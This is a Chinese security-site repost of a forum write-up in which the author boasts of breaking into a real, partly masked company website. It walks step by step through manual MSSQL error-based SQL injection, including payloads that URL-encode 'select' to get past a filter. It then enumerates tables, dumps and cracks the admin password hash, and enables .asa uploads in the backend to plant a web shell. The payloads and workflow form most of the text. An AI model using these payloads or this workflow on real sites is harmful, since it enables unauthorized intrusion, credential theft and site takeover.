刀城技术网-信息安全,服务器安全维护,网站安全维护

当前位置: 网站主页 > 数据安全 > MSSQL注入 >

一次简单的mssql手注

时间:2012-06-05 22:54来源:http://forum.cnsec.org 作者:音符 点击:
作者:音符 原文地址:http://forum.cnsec.org/forum-viewthread-tid-80178-highlight-mssql.html 应该说没有啥子技术含量,大家凑合着看。以前日了很多站,思路都不错很多都忘记了压力很大,看来我以后得边日站边做笔记了嘿嘿。问题是这个站我是要旁注的,但
作者:音符
原文地址:http://forum.cnsec.org/forum-viewthread-tid-80178-highlight-mssql.html

应该说没有啥子技术含量,大家凑合着看。以前日了很多站,思路都不错很多都忘记了压力很大,看来我以后得边日站边做笔记了嘿嘿。问题是这个站我是要旁注的,但是拿下之后居然忘记自己一开始的目标是哪个站了。有压力。
废话不说,直接上主题。
注入点:http://www.****8.com/cn/newsinfo.aspx?id=3491
And 1=1跟and 1=2经典测试,结果不同,存在注入。本来以为简单了,直接扔到pangolin里面去,但是结果让我很无语。大家请看图1,图

,图一可知是DBO权限,但是图二的话嘛。

着实让我捏汗,居然找不到表段,可能有很多人到这里有放弃了。但是从前面的渗透来看,既然可以用逻辑判断存在注入说明语句有被执行,那么不能查看表就一定是被过滤的语句,我只好手注试试了。
抓包了pangolin的语句如下:cn/newsinfo.aspx?id=3489%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[sysobjects]%20where%20xtype=char(85)%20and%20status!=0)=0—
然后自己修改了下,地址栏提交and 1=convert(int,(select top 1 name from sysobjects where xtype='U')),结果如图、

也就是说有过滤咯,果断猜想过滤的是select,无压力URL编码转换果断绕过。提交代码and 1=convert(int,(%73%65%6C%65%63%74 top 1 name from sysobjects where xtype='U'))结果如图




关注到的语句是d:\wwwroot\asia-asset\wwwroot\cn\newsinfo.aspx.cs跟将 nvarchar 值 'Whir_ModelForms' 转换为数据类型为 int 的列时发生语法错误。
爆出的是网站根目录跟第一个表名,本来想要差异备份拿shell的但是不知道为什么不管怎样都写不进去,没办法只好拿后台密码了。继续提交代码。
and 1=convert(int,(%73%65%6C%65%63%74 top 1 name from sysobjects where xtype='U' and name not in ('Whir_ModelForms'))),结果如图


看到了Whir_ModelForms变成了ChinaArea,我们继续依次提交。终于在我提交代码
and 1=convert(int,(%73%65%6C%65%63%74 top 1 name from sysobjects where xtype='U' and name not in ('Whir_ModelForms','bin_cmd','ChinaArea','cmd','dirs','dtest','dtproperties','Whir_AccessStat')))
有如下回显



很明显了 管理员表名就是admininfo这个了。直接果断爆字段好了,键入语句如下
%73%65%6C%65%63%74 * from Whir_AdminInfo having 1=1,结果如图。



爆出了所有的字段,简单了爆数据,代码:
and 1=convert(int,(%73%65%6C%65%63%74 top 1 adminPassword from Whir_AdminInfo)),结果如下:



那么密码就是DC76E9F0C0006E8F919E0C515C66DBBA3982F785解密后的,解密出来居然是root。。
直接拿到后台去,果断登陆。后台新闻发布上传设置很严 还是eweb aspx下完全无希望。终于给我发现一个地方。



这个图片设置跟上传设置它是没有对勾的,我打上了对勾,然后果断在上传设置添加asa,然后在图片设置那里上传asa小马,果断结束渗透。结果如图。




 


(责任编辑:刀)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
栏目列表
推荐内容
  • 渗透居然之家网站

    前言 在用百度mp3听音乐的时候,看到了一个叫居然家居的公司的广告,百度了一下,做的...

  • Sa提权sql语句大全

    看文章中有提到lake2,文章应当是他写的吧。我稍微整理了一下,by daokers...

  • 清理数据库批量挂马

    数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公...